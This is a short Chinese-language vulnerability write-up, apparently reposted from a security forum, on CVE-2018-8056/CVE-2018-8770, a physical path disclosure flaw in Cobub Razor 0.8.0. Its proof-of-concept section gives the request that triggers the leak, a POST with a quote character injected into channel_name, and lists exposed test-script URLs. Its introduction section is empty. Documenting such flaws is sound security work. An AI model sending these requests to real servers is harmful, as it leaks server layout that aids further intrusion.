（CVE-2018-8056/CVE-2018-8770）Cobub Razor 0.8.0 存在物理路径泄露漏洞

# （CVE-2018-8056/CVE-2018-8770）Cobub Razor 0.8.0 存在物理路径泄露漏洞

> 原文：[https://www.zhihuifly.com/t/topic/2849](https://www.zhihuifly.com/t/topic/2849)

# （CVE-2018-8056/CVE-2018-8770）Cobub Razor 0.8.0 存在物理路径泄露漏洞

## 一、漏洞简介

## 二、漏洞影响

Cobub Razor 0.8.0

## 三、复现过程

### POC

> 方法一：

“`
URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test”&platform=1
“`

> 方法二：
> Cobub Razor 0.8.0存在物理路径泄露漏洞，当访问特定url时，系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。

“`
HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php
“`